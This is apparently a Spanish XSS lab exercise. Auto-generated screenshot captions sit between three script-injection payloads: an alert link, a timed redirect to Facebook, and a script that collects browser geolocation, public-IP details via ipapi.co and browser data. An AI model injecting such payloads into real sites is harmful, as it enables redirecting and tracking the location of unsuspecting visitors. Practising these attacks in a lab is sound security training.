Interfaz de usuario gráfica, Aplicación

El contenido generado por IA puede ser incorrecto.

Interfaz de usuario gráfica, Texto, Aplicación

El contenido generado por IA puede ser incorrecto.

<a href="javascript:alert('XSS')">Click</a>

Interfaz de usuario gráfica, Texto, Aplicación

El contenido generado por IA puede ser incorrecto.

<script>

// Redirige después de 3 segundos

setTimeout(function() {

window.location.href = "https://facebook.com";

}, 3000);

alert("Serás redirigido a Facebook en 3 segundos...");

</script>

Una captura de pantalla de una computadora

El contenido generado por IA puede ser incorrecto.

<script>

// Obtener ubicación por geolocalización del navegador

navigator.geolocation.getCurrentPosition(function(position) {

console.log("==== Ubicación GPS del Navegador ====");

console.log("Latitud: " + position.coords.latitude);

console.log("Longitud: " + position.coords.longitude);

console.log("Precisión: " + position.coords.accuracy + " metros");

console.log("Altitud: " + position.coords.altitude);

console.log("Velocidad: " + position.coords.speed);

console.log("Dirección: " + position.coords.heading);

console.log("Fecha/Hora: " + new Date(position.timestamp).toString());

}, function(error) {

console.error("Error en geolocalización: ", error.message);

});

// Obtener información de IP pública y otros datos

fetch("https://ipapi.co/json/")

.then(response => response.json())

.then(data => {

console.log("==== Datos de IP Pública ====");

console.log("Dirección IP: " + data.ip);

console.log("Ciudad: " + data.city);

console.log("Región: " + data.region);

console.log("País: " + data.country\_name);

console.log("Código país: " + data.country);

console.log("Código postal: " + data.postal);

console.log("ISP/Proveedor: " + data.org);

console.log("Zona horaria: " + data.timezone);

console.log("Lat/Lon estimada por IP: " + data.latitude + ", " + data.longitude);

})

.catch(error => {

console.error("Error obteniendo IP info: ", error);

});

// Mostrar información del navegador

console.log("==== Información del Navegador ====");

console.log("Agente de usuario: " + navigator.userAgent);

console.log("Idioma del navegador: " + navigator.language);

console.log("Plataforma: " + navigator.platform);

</script>